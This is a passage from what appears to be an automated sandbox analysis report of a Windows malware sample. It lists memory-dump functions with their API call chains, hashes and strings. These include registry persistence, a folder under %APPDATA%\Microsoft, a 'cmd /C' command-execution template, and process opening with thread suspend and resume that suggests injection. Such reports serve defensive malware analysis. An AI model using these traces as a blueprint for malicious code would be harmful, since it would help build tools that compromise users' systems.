  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
